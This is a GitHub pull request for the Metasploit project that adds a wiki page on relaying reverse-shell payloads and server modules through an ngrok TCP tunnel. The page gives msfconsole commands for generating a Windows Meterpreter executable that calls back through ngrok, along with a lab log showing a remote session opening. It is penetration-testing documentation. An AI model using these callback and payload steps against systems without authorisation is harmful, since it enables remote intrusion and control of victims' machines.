Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add docs on how to use ngrok with Metasploit #19452

Merged
merged 3 commits into from
Sep 13, 2024
Merged

Add docs on how to use ngrok with Metasploit #19452

Show file tree
Hide file tree
Changes from 2 commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
4f8d91c
Add the initial ngrok docs
zeroSteiner Sep 10, 2024
f16f1aa
Finish the ngrok documentation
zeroSteiner Sep 10, 2024
8a812c2
Update the docs to highlight DNS handling
zeroSteiner Sep 12, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
117 changes: 117 additions & 0 deletions docs/metasploit-framework.wiki/How-to-use-Metasploit-with-ngrok.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,117 @@
# Overview
[ngrok][1] is a popular service that offers free port-forwarding that is easy to setup without needing to run a
dedicated server on a public IP address (as is the case with SSH, socat and other more traditional options. This means
that users behind a SNATing device such as a SOHO router can accept reverse shells and other connections without needing
to configure port forwarding.

**WARNING:** The nature of using ngrok is to send traffic through a third party. ngrok and the server which it utilizes
are not affiliated with the Metasploit project. Use of ngrok effectively sends traffic through an untrusted third party
and should be done with extreme caution. While Meterpreter has offered end-to-end encryption since Metasploit 6.0, other
payloads and connections do not.

ngrok can start multiple types of tunnels. The `tcp` tunnel is compatible with Metasploit's payloads and most closely
resembles a traditional port-forwarding configuration. The `http` tunnel type is not compatible with payloads, and
should not be used. The `tls` tunnel type may be compatible, but access to it is restricted to the Enterprise and
Pay-as-you-go paid plans. This document will focus on the use cases for the `tcp` tunnel type. Note that one limitation
is that the public port can not be configured, it is randomly selected by ngrok meaning that the target will need to be
able to connect to this high, obscure port which may be prevented by egress filtering.

## Usage with payloads
Use with payloads can be achieved with any of the reverse-connection stagers that accept `LHOST` and `LPORT` options,
e.g. reverse_tcp, reverse_http, reverse_https, etc. but not reverse_named_pipe. In the following scenario, ngrok will be
used to forward a random public port to the Metasploit listener on port 4444. This scenario assumes that Metasploit and
ngrok are running on the same host.

1. Start a TCP tunnel using ngrok: `ngrok tcp localhost:4444`.
1. ngrok should start running and display a few settings, including a line that says "Forwarding". Note the host and IP
address from this line, e.g. `4.tcp.ngrok.io:13779`
1. Start msfconsole and use the desired payload or exploit module.
* Using `msfconsole` for both generating the payload and handling the connection is recommended over using `msfvenom`
for two reasons.
1. Using `msfvenom` starts up an instance of the framework to generate the payload, making it a slower process.
2. Using `msfconsole` to configure both the payload and handler simultaneously ensures that the options are set for
both, eliminating the possibility that they are out of sync.
1. Set the `LHOST` option to the address noted in step 2, `4.tcp.ngrok.io` in the example. This is where the payload is
expecting to connect to.
1. Set the `LPORT` option to the port noted in step 2, `13779` in the example.
1. Set the `ReverseListenerBindAddress` option to `127.0.0.1`. This is where the connection will actually be accepted
from ngrok.
1. Set the `ReverseListenerBindPort` option to `4444`.
1. Either run the exploit, or generate the payload with the `generate` command and start the handler with `to_handler`

Once the payload has been executed, either through the exploit or manual means, there should be a open connection seen
through the ngrok terminal.

### Payload Demo

ngrok side:
```
$ ngrok tcp localhost:4444
ngrok (Ctrl+C to quit)

Take our ngrok in production survey! https://forms.gle/aXiBFWzEA36DudFn6

Session Status online
Account ????? (Plan: Personal)
Version 3.16.0
Region United States (us)
Latency 33ms
Web Interface http://127.0.0.1:4040
Forwarding tcp://0.tcp.ngrok.io:17511 -> localhost:4444

Connections ttl opn rt1 rt5 p50 p90
0 0 0.00 0.00 0.00 0.00
```

metasploit side:
```
adfoster-r7 marked this conversation as resolved.
Show resolved Hide resolved
msf6 > use payload/windows/x64/meterpreter/reverse_http
msf6 payload(windows/x64/meterpreter/reverse_http) > set LHOST 0.tcp.ngrok.io
LHOST => 0.tcp.ngrok.io
msf6 payload(windows/x64/meterpreter/reverse_http) > set LPORT 17511
LPORT => 17511
msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindAddress 127.0.0.1
ReverseListenerBindAddress => 127.0.0.1
msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindPort 4444
ReverseListenerBindPort => 4444
msf6 payload(windows/x64/meterpreter/reverse_http) > to_handler
[*] Payload Handler Started as Job 2
msf6 payload(windows/x64/meterpreter/reverse_http) >
[*] Started HTTP reverse handler on http://127.0.0.1:4444

msf6 payload(windows/x64/meterpreter/reverse_http) > generate -f exe -o ngrok_payload.exe
[*] Writing 7168 bytes to ngrok_payload.exe...
msf6 payload(windows/x64/meterpreter/reverse_http) >
[*] http://127.0.0.1:4444 handling request from 127.0.0.1; (UUID: ghzekibo) Staging x64 payload (202844 bytes) ...
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55468) at 2024-09-10 16:43:58 -0400

msf6 payload(windows/x64/meterpreter/reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: MSFLAB\smcintyre
meterpreter >
```

## Usage with server modules
Some modules expect connections to be made to them by the target. These modules can also be used with ngrok, with some
slight variations to the payload workflow in regards to their datastore options. Modules that start servers can be
identified by using the `SRVHOST` and `SRVPORT` datastore options.

**NOTE:** Free ngrok plans can only open one tcp tunnel at a time. This means that if the module is an exploit that a
tcp tunnel for a reverse-connection payload will not be able to be opened at the same time. Use a second ngrok account
to open a second tcp tunnel and follow the steps above for the payload configuration.

1. Start a TCP tunnel using ngrok: `ngrok tcp localhost:4444`.
1. ngrok should start running and display a few settings, including a line that says "Forwarding". Note the host and IP
address from this line, e.g. `4.tcp.ngrok.io:13779`
1. Start msfconsole and use the desired module.
1. Set the `SRVHOST` option to the address noted in step 2, `4.tcp.ngrok.io` in the example. This is where the payload is
expecting to connect to.
1. Set the `SRVPORT` option to the port noted in step 2, `13779` in the example.
1. Set the `ListenerBindAddress` option to `127.0.0.1`. This is where the connection will actually be accepted
from ngrok.
1. Set the `ListenerBindPort` option to `4444`.
1. Run the module

[1]: https://ngrok.com/
3 changes: 3 additions & 0 deletions docs/navigation.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -445,6 +445,9 @@ def without_prefix(prefix)
{
path: 'How-to-use-the-Favorite-command.md'
},
{
path: 'How-to-use-Metasploit-with-ngrok.md'
},
]
},
]
Expand Down
Loading